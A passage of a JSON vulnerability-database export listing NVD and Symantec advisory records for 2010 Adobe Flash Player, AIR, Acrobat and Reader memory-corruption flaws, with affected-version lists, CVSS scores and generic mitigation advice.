"cpe:2.3:a:adobe:flash_player:10.1.82.76:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:8.0.33.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:8.0.34.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.25:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.52.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.151.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.69.0:*:*:*:*:*:*:*", "cpe:2.3:a:macromedia:flash_player:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.125.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:macromedia:flash_player:6.0.79.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.12.10:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.15.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:macromedia:flash_player:6.0.47.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:8.0.22.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.42.34:*:*:*:*:*:*:*", "cpe:2.3:a:macromedia:flash_player:6.0.29.0:*:*:*:*:*:*:*", "cpe:2.3:a:macromedia:flash_player:6.0.40.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.52.15:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.125.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.22.87:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.85.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:6.0.21.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.18d60:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.124.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.28.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.114.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.92.10:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:8.0.24.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.246.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.28:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.32.18:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.53.64:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.12.36:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:8.0.35.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.45.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.152.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.20.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.92.8:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.63:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.1:*:*:*:*:*:*:*", "cpe:2.3:a:macromedia:flash_player:6.0.65.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.48.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.45.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.31.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:8.0.42.0:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:34:43", "description": "An unspecified ActiveX control in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 (Flash10h.ocx) on Windows allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted FLV video.", "edition": 6, "cvss3": {}, "published": "2010-11-07T22:00:00", "title": "CVE-2010-3637", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3637"], "modified": "2019-10-09T23:01:00", "cpe": [], "id": "CVE-2010-3637", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3637", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2020-12-09T19:34:43", "description": "Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, and CVE-2010-3652.", "edition": 6, "cvss3": {}, "published": "2010-11-07T22:00:00", "title": "CVE-2010-3650", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3650"], "modified": "2019-10-09T23:01:00", "cpe": ["cpe:/a:adobe:flash_player:10.1.95.1"], "id": "CVE-2010-3650", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3650", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:10.1.95.1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:34:43", "description": "Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, and CVE-2010-3652.", "edition": 6, "cvss3": {}, "published": "2010-11-07T22:00:00", "title": "CVE-2010-3647", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3647"], "modified": "2019-10-09T23:01:00", "cpe": ["cpe:/a:adobe:flash_player:10.1.95.1"], "id": "CVE-2010-3647", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3647", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:10.1.95.1:*:*:*:*:*:*:*"]}], "symantec": [{"lastseen": "2018-03-12T02:29:29", "bulletinFamily": "software", "cvelist": ["CVE-2010-3643"], "description": "### Description\n\nAdobe Flash Player is prone to a remote memory corruption vulnerability. An attacker can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions. NOTE: This issue was previously discussed in BID 44669 (Adobe Flash Player APSB10-26 Multiple Remote Vulnerabilities), but has been given its own record to better document it.\n\n### Technologies Affected\n\n * Adobe AIR 1.0 \n * Adobe AIR 1.01 \n * Adobe AIR 1.1 \n * Adobe AIR 1.5 \n * Adobe AIR 1.5.1 \n * Adobe AIR 1.5.2 \n * Adobe AIR 1.5.3 \n * Adobe AIR 1.5.3.9120 \n * Adobe AIR 1.5.3.9130 \n * Adobe AIR 2.0.2 \n * Adobe AIR 2.0.2.12610 \n * Adobe AIR 2.0.3 \n * Adobe AIR 2.0.3 \n * Adobe AIR 2.0.4 \n * Adobe Flash Player 10 \n * Adobe Flash Player 10.0.0.584 \n * Adobe Flash Player 10.0.12 .35 \n * Adobe Flash Player 10.0.12 .36 \n * Adobe Flash Player 10.0.12.10 \n * Adobe Flash Player 10.0.15 .3 \n * Adobe Flash Player 10.0.22.87 \n * Adobe Flash Player 10.0.32 18 \n * Adobe Flash Player 10.0.32.18 \n * Adobe Flash Player 10.0.42.34 \n * Adobe Flash Player 10.0.45 2 \n * Adobe Flash Player 10.0.45 2 \n * Adobe Flash Player 10.0.45.2 \n * Adobe Flash Player 10.1 Release Candidate \n * Adobe Flash Player 10.1.51.66 \n * Adobe Flash Player 10.1.53.64 \n * Adobe Flash Player 10.1.82.76 \n * Adobe Flash Player 10.1.85.3 \n * Adobe Flash Player 10.1.92.10 \n * Adobe Flash Player 10.1.92.10 \n * Adobe Flash Player 10.1.95.1 \n * Adobe Flash Player 10.1.95.2 \n * Adobe Flash Player 9 \n * Adobe Flash Player 9.0.112.0 \n * Adobe Flash Player 9.0.114.0 \n * Adobe Flash Player 9.0.115.0 \n * Adobe Flash Player 9.0.124.0 \n * Adobe Flash Player 9.0.125.0 \n * Adobe Flash Player 9.0.151 .0 \n * Adobe Flash Player 9.0.152 .0 \n * Adobe Flash Player 9.0.159.0 \n * Adobe Flash Player 9.0.16 \n * Adobe Flash Player 9.0.18D60 \n * Adobe Flash Player 9.0.20 \n * Adobe Flash Player 9.0.20.0 \n * Adobe Flash Player 9.0.246 0 \n * Adobe Flash Player 9.0.246.0 \n * Adobe Flash Player 9.0.260.0 \n * Adobe Flash Player 9.0.262 \n * Adobe Flash Player 9.0.277.0 \n * Adobe Flash Player 9.0.28.0 \n * Adobe Flash Player 9.0.28.0 \n * Adobe Flash Player 9.0.280 \n * Adobe Flash Player 9.0.31.0 \n * Adobe Flash Player 9.0.31.0 \n * Adobe Flash Player 9.0.45.0 \n * Adobe Flash Player 9.0.47.0 \n * Adobe Flash Player 9.0.48.0 \n * Adobe Flash Player 9.125.0 \n * Apple Mac OS X 10.5 \n * Apple Mac OS X 10.5.0 \n * Apple Mac OS X 10.5.1 \n * Apple Mac OS X 10.5.2 \n * Apple Mac OS X 10.5.3 \n * Apple Mac OS X 10.5.4 \n * Apple Mac OS X 10.5.5 \n * Apple Mac OS X 10.5.6 \n * Apple Mac OS X 10.5.7 \n * Apple Mac OS X 10.5.8 \n * Apple Mac OS X 10.6 \n * Apple Mac OS X 10.6.1 \n * Apple Mac OS X 10.6.2 \n * Apple Mac OS X 10.6.3 \n * Apple Mac OS X 10.6.4 \n * Apple Mac OS X Server 10.5 \n * Apple Mac OS X Server 10.5.0 \n * Apple Mac OS X Server 10.5.1 \n * Apple Mac OS X Server 10.5.2 \n * Apple Mac OS X Server 10.5.3 \n * Apple Mac OS X Server 10.5.4 \n * Apple Mac OS X Server 10.5.5 \n * Apple Mac OS X Server 10.5.6 \n * Apple Mac OS X Server 10.5.7 \n * Apple Mac OS X Server 10.5.8 \n * Apple Mac OS X Server 10.6 \n * Apple Mac OS X Server 10.6.1 \n * Apple Mac OS X Server 10.6.2 \n * Apple Mac OS X Server 10.6.3 \n * Apple Mac OS X Server 10.6.4 \n * Gentoo Linux \n * HP Systems Insight Manager 6.0 \n * HP Systems Insight Manager 6.0.0.96 \n * HP Systems Insight Manager 6.1 \n * HP Systems Insight Manager 6.2 \n * Redhat Desktop Extras 4 \n * Redhat Enterprise Linux AS Extras 4 \n * Redhat Enterprise Linux Desktop Supplementary 5 Client \n * Redhat Enterprise Linux ES Extras 4 \n * Redhat Enterprise Linux Extras 4 \n * Redhat Enterprise Linux Supplementary 5 Server \n * Redhat Enterprise Linux WS Extras 4 \n * SuSE Suse Linux Enterprise Desktop 11 \n * SuSE Suse Linux Enterprise Desktop 11 SP1 \n * SuSE openSUSE 11.1 \n * SuSE openSUSE 11.2 \n * SuSE openSUSE 11.3 \n * Sun Solaris 10 Sparc \n * Sun Solaris 10 X86 \n * Sun Solaris 11 \n * Sun Solaris 11 Express \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, run the application with the minimal amount of privileges required for functionality.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity including unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo reduce the likelihood of successful exploits, never handle files that originate from unfamiliar or untrusted sources. \n\n**Do not follow links provided by unknown or untrusted sources.** \nTo reduce the likelihood of attacks, never visit sites of questionable integrity or follow links provided by unfamiliar or untrusted sources. \n\n**Implement multiple redundant layers of security.** \nVarious memory-protection schemes (such as nonexecutable and randomly mapped memory segments) may hinder an attacker's ability to exploit this vulnerability to execute arbitrary code.\n\nUpdates are available. Please see the references for more information.\n", "modified": "2010-11-04T00:00:00", "published": "2010-11-04T00:00:00", "id": "SMNTC-44679", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/44679", "type": "symantec", "title": "Adobe Flash Player CVE-2010-3643 Remote Memory Corruption Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-14T22:43:15", "bulletinFamily": "software", "cvelist": ["CVE-2010-3648"], "description": "### Description\n\nAdobe Flash Player is prone to a remote memory corruption vulnerability. An attacker can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions. NOTE: This issue was previously discussed in BID 44669 (Adobe Flash Player APSB10-26 Multiple Remote Vulnerabilities), but has been given its own record to better document it.\n\n### Technologies Affected\n\n * Adobe AIR 1.0 \n * Adobe AIR 1.01 \n * Adobe AIR 1.1 \n * Adobe AIR 1.5 \n * Adobe AIR 1.5.1 \n * Adobe AIR 1.5.2 \n * Adobe AIR 1.5.3 \n * Adobe AIR 1.5.3.9120 \n * Adobe AIR 1.5.3.9130 \n * Adobe AIR 2.0.2 \n * Adobe AIR 2.0.2.12610 \n * Adobe AIR 2.0.3 \n * Adobe AIR 2.0.3 \n * Adobe AIR 2.0.4 \n * Adobe Flash Player 10 \n * Adobe Flash Player 10.0.0.584 \n * Adobe Flash Player 10.0.12 .35 \n * Adobe Flash Player 10.0.12 .36 \n * Adobe Flash Player 10.0.12.10 \n * Adobe Flash Player 10.0.15 .3 \n * Adobe Flash Player 10.0.22.87 \n * Adobe Flash Player 10.0.32 18 \n * Adobe Flash Player 10.0.32.18 \n * Adobe Flash Player 10.0.42.34 \n * Adobe Flash Player 10.0.45 2 \n * Adobe Flash Player 10.0.45 2 \n * Adobe Flash Player 10.0.45.2 \n * Adobe Flash Player 10.1 Release Candidate \n * Adobe Flash Player 10.1.51.66 \n * Adobe Flash Player 10.1.53.64 \n * Adobe Flash Player 10.1.82.76 \n * Adobe Flash Player 10.1.85.3 \n * Adobe Flash Player 10.1.92.10 \n * Adobe Flash Player 10.1.92.10 \n * Adobe Flash Player 10.1.95.1 \n * Adobe Flash Player 10.1.95.2 \n * Adobe Flash Player 9 \n * Adobe Flash Player 9.0.112.0 \n * Adobe Flash Player 9.0.114.0 \n * Adobe Flash Player 9.0.115.0 \n * Adobe Flash Player 9.0.124.0 \n * Adobe Flash Player 9.0.125.0 \n * Adobe Flash Player 9.0.151 .0 \n * Adobe Flash Player 9.0.152 .0 \n * Adobe Flash Player 9.0.159.0 \n * Adobe Flash Player 9.0.16 \n * Adobe Flash Player 9.0.18D60 \n * Adobe Flash Player 9.0.20 \n * Adobe Flash Player 9.0.20.0 \n * Adobe Flash Player 9.0.246 0 \n * Adobe Flash Player 9.0.246.0 \n * Adobe Flash Player 9.0.260.0 \n * Adobe Flash Player 9.0.262 \n * Adobe Flash Player 9.0.277.0 \n * Adobe Flash Player 9.0.28.0 \n * Adobe Flash Player 9.0.28.0 \n * Adobe Flash Player 9.0.280 \n * Adobe Flash Player 9.0.31.0 \n * Adobe Flash Player 9.0.31.0 \n * Adobe Flash Player 9.0.45.0 \n * Adobe Flash Player 9.0.47.0 \n * Adobe Flash Player 9.0.48.0 \n * Adobe Flash Player 9.125.0 \n * Apple Mac OS X 10.5 \n * Apple Mac OS X 10.5.0 \n * Apple Mac OS X 10.5.1 \n * Apple Mac OS X 10.5.2 \n * Apple Mac OS X 10.5.3 \n * Apple Mac OS X 10.5.4 \n * Apple Mac OS X 10.5.5 \n * Apple Mac OS X 10.5.6 \n * Apple Mac OS X 10.5.7 \n * Apple Mac OS X 10.5.8 \n * Apple Mac OS X 10.6 \n * Apple Mac OS X 10.6.1 \n * Apple Mac OS X 10.6.2 \n * Apple Mac OS X 10.6.3 \n * Apple Mac OS X 10.6.4 \n * Apple Mac OS X Server 10.5 \n * Apple Mac OS X Server 10.5.0 \n * Apple Mac OS X Server 10.5.1 \n * Apple Mac OS X Server 10.5.2 \n * Apple Mac OS X Server 10.5.3 \n * Apple Mac OS X Server 10.5.4 \n * Apple Mac OS X Server 10.5.5 \n * Apple Mac OS X Server 10.5.6 \n * Apple Mac OS X Server 10.5.7 \n * Apple Mac OS X Server 10.5.8 \n * Apple Mac OS X Server 10.6 \n * Apple Mac OS X Server 10.6.1 \n * Apple Mac OS X Server 10.6.2 \n * Apple Mac OS X Server 10.6.3 \n * Apple Mac OS X Server 10.6.4 \n * Gentoo Linux \n * HP Systems Insight Manager 6.0 \n * HP Systems Insight Manager 6.0.0.96 \n * HP Systems Insight Manager 6.1 \n * HP Systems Insight Manager 6.2 \n * Redhat Desktop Extras 4 \n * Redhat Enterprise Linux AS Extras 4 \n * Redhat Enterprise Linux Desktop Supplementary 5 Client \n * Redhat Enterprise Linux ES Extras 4 \n * Redhat Enterprise Linux Extras 4 \n * Redhat Enterprise Linux Supplementary 5 Server \n * Redhat Enterprise Linux WS Extras 4 \n * SuSE Suse Linux Enterprise Desktop 11 \n * SuSE Suse Linux Enterprise Desktop 11 SP1 \n * SuSE openSUSE 11.1 \n * SuSE openSUSE 11.2 \n * SuSE openSUSE 11.3 \n * Sun Solaris 10 Sparc \n * Sun Solaris 10 X86 \n * Sun Solaris 11 \n * Sun Solaris 11 Express \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, run the application with the minimal amount of privileges required for functionality.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity including unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo reduce the likelihood of successful exploits, never handle files that originate from unfamiliar or untrusted sources. \n\n**Do not follow links provided by unknown or untrusted sources.** \nTo reduce the likelihood of attacks, never visit sites of questionable integrity or follow links provided by unfamiliar or untrusted sources. \n\n**Implement multiple redundant layers of security.** \nVarious memory-protection schemes (such as nonexecutable and randomly mapped memory segments) may hinder an attacker's ability to exploit this vulnerability to execute arbitrary code.\n\nUpdates are available. Please see the references for more information.\n", "modified": "2010-11-04T00:00:00", "published": "2010-11-04T00:00:00", "id": "SMNTC-44684", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/44684", "type": "symantec", "title": "Adobe Flash Player CVE-2010-3648 Remote Memory Corruption Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-12T10:28:27", "bulletinFamily": "software", "cvelist": ["CVE-2010-3654"], "description": "### Description\n\nAdobe Acrobat, Reader, and Flash are prone to a remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected application. The following products are affected: Adobe Flash Player 10.1.85.3 and prior for Windows, Mac OS X, Linux, and Solaris Adobe Flash Player 10.1.95.2 and prior for Android Adobe Reader 9.4 and prior for Windows, Mac OS X, and Unix Adobe Acrobat 9.4 and prior for Windows and Mac OS X\n\n### Technologies Affected\n\n * Adobe AIR 1.0 \n * Adobe AIR 1.01 \n * Adobe AIR 1.1 \n * Adobe AIR 1.5 \n * Adobe AIR 1.5.1 \n * Adobe AIR 1.5.2 \n * Adobe AIR 1.5.3 \n * Adobe AIR 1.5.3.9120 \n * Adobe AIR 1.5.3.9130 \n * Adobe AIR 2.0.2 \n * Adobe AIR 2.0.2.12610 \n * Adobe AIR 2.0.3 \n * Adobe AIR 2.0.3 \n * Adobe AIR 2.0.4 \n * Adobe Acrobat 9.1.1 \n * Adobe Acrobat 9.2 \n * Adobe Acrobat 9.3 \n * Adobe Acrobat 9.3.1 \n * Adobe Acrobat 9.3.2 \n * Adobe Acrobat 9.3.3 \n * Adobe Acrobat 9.3.3 \n * Adobe Acrobat 9.3.4 \n * Adobe Acrobat 9.3.4 \n * Adobe Acrobat 9.4 \n * Adobe Acrobat Professional 9 \n * Adobe Acrobat Professional 9 Extended \n * Adobe Acrobat Professional 9.1 \n * Adobe Acrobat Professional 9.1.2 \n * Adobe Acrobat Professional 9.1.3 \n * Adobe Acrobat Professional 9.2 \n * Adobe Acrobat Professional 9.3 \n * Adobe Acrobat Professional 9.3.1 \n * Adobe Acrobat Professional 9.3.2 \n * Adobe Acrobat Professional 9.3.3 \n * Adobe Acrobat Professional 9.3.4 \n * Adobe Acrobat Professional 9.4 \n * Adobe Acrobat Reader (for Linux) 9.3.3 \n * Adobe Acrobat Standard 9 \n * Adobe Acrobat Standard 9.1 \n * Adobe Acrobat Standard 9.1.2 \n * Adobe Acrobat Standard 9.1.3 \n * Adobe Acrobat Standard 9.2 \n * Adobe Acrobat Standard 9.3 \n * Adobe Acrobat Standard 9.3.1 \n * Adobe Acrobat Standard 9.3.2 \n * Adobe Acrobat Standard 9.3.3 \n * Adobe Acrobat Standard 9.3.4 \n * Adobe Acrobat Standard 9.3.4 \n * Adobe Acrobat Standard 9.4 \n * Adobe Flash Player 10 \n * Adobe Flash Player 10.0.0.584 \n * Adobe Flash Player 10.0.12 .35 \n * Adobe Flash Player 10.0.12 .36 \n * Adobe Flash Player 10.0.12.10 \n * Adobe Flash Player 10.0.15 .3 \n * Adobe Flash Player 10.0.22.87 \n * Adobe Flash Player 10.0.32 18 \n * Adobe Flash Player 10.0.32.18 \n * Adobe Flash Player 10.0.42.34 \n * Adobe Flash Player 10.0.45 2 \n * Adobe Flash Player 10.0.45 2 \n * Adobe Flash Player 10.0.45.2 \n * Adobe Flash Player 10.1 Release Candidate \n * Adobe Flash Player 10.1.51.66 \n * Adobe Flash Player 10.1.53.64 \n * Adobe Flash Player 10.1.82.76 \n * Adobe Flash Player 10.1.85.3 \n * Adobe Flash Player 10.1.92.10 \n * Adobe Flash Player 10.1.92.10 \n * Adobe Flash Player 10.1.95.1 \n * Adobe Flash Player 10.1.95.2 \n * Adobe Flash Player 7 \n * Adobe Flash Player 7.0.1 \n * Adobe Flash Player 7.0.25 \n * Adobe Flash Player 7.0.63 \n * Adobe Flash Player 7.0.69.0 \n * Adobe Flash Player 7.0.70.0 \n * Adobe Flash Player 7.1 \n * Adobe Flash Player 7.1.1 \n * Adobe Flash Player 7.2 \n * Adobe Flash Player 8 \n * Adobe Flash Player 8.0.22.0 \n * Adobe Flash Player 8.0.24.0 \n * Adobe Flash Player 8.0.33.0 \n * Adobe Flash Player 8.0.34.0 \n * Adobe Flash Player 8.0.35.0 \n * Adobe Flash Player 8.0.39.0 \n * Adobe Flash Player 8.0.42.0 \n * Adobe Flash Player 9 \n * Adobe Flash Player 9.0.112.0 \n * Adobe Flash Player 9.0.114.0 \n * Adobe Flash Player 9.0.115.0 \n * Adobe Flash Player 9.0.124.0 \n * Adobe Flash Player 9.0.125.0 \n * Adobe Flash Player 9.0.151 .0 \n * Adobe Flash Player 9.0.152 .0 \n * Adobe Flash Player 9.0.159.0 \n * Adobe Flash Player 9.0.16 \n * Adobe Flash Player 9.0.18D60 \n * Adobe Flash Player 9.0.20 \n * Adobe Flash Player 9.0.20.0 \n * Adobe Flash Player 9.0.246 0 \n * Adobe Flash Player 9.0.246.0 \n * Adobe Flash Player 9.0.260.0 \n * Adobe Flash Player 9.0.262 \n * Adobe Flash Player 9.0.277.0 \n * Adobe Flash Player 9.0.28.0 \n * Adobe Flash Player 9.0.28.0 \n * Adobe Flash Player 9.0.280 \n * Adobe Flash Player 9.0.31.0 \n * Adobe Flash Player 9.0.31.0 \n * Adobe Flash Player 9.0.45.0 \n * Adobe Flash Player 9.0.47.0 \n * Adobe Flash Player 9.0.48.0 \n * Adobe Flash Player 9.125.0 \n * Adobe Reader 9 \n * Adobe Reader 9.1 \n * Adobe Reader 9.1.1 \n * Adobe Reader 9.1.2 \n * Adobe Reader 9.1.3 \n * Adobe Reader 9.2 \n * Adobe Reader 9.3 \n * Adobe Reader 9.3.1 \n * Adobe Reader 9.3.2 \n * Adobe Reader 9.3.3 \n * Adobe Reader 9.3.4 \n * Adobe Reader 9.3.4 \n * Adobe Reader 9.4 \n * Apple Mac OS X 10.5 \n * Apple Mac OS X 10.5.0 \n * Apple Mac OS X 10.5.1 \n * Apple Mac OS X 10.5.2 \n * Apple Mac OS X 10.5.3 \n * Apple Mac OS X 10.5.4 \n * Apple Mac OS X 10.5.5 \n * Apple Mac OS X 10.5.6 \n * Apple Mac OS X 10.5.7 \n * Apple Mac OS X 10.5.8 \n * Apple Mac OS X 10.6 \n * Apple Mac OS X 10.6.1 \n * Apple Mac OS X 10.6.2 \n * Apple Mac OS X 10.6.3 \n * Apple Mac OS X 10.6.4 \n * Apple Mac OS X Server 10.5 \n * Apple Mac OS X Server 10.5.0 \n * Apple Mac OS X Server 10.5.1 \n * Apple Mac OS X Server 10.5.2 \n * Apple Mac OS X Server 10.5.3 \n * Apple Mac OS X Server 10.5.4 \n * Apple Mac OS X Server 10.5.5 \n * Apple Mac OS X Server 10.5.6 \n * Apple Mac OS X Server 10.5.7 \n * Apple Mac OS X Server 10.5.8 \n * Apple Mac OS X Server 10.6 \n * Apple Mac OS X Server 10.6.1 \n * Apple Mac OS X Server 10.6.2 \n * Apple Mac OS X Server 10.6.3 \n * Apple Mac OS X Server 10.6.4 \n * Gentoo Linux \n * Google Chrome 5.0.306.0 \n * Google Chrome 5.0.306.1 \n * Google Chrome 5.0.307.1 \n * Google Chrome 5.0.307.10 \n * Google Chrome 5.0.307.11 \n * Google Chrome 5.0.307.3 \n * Google Chrome 5.0.307.4 \n * Google Chrome 5.0.307.5 \n * Google Chrome 5.0.307.6 \n * Google Chrome 5.0.307.7 \n * Google Chrome 5.0.307.8 \n * Google Chrome 5.0.307.9 \n * Google Chrome 5.0.308.0 \n * Google Chrome 5.0.309.0 \n * Google Chrome 5.0.313.0 \n * Google Chrome 5.0.314.0 \n * Google Chrome 5.0.314.1 \n * Google Chrome 5.0.315.0 \n * Google Chrome 5.0.316.0 \n * 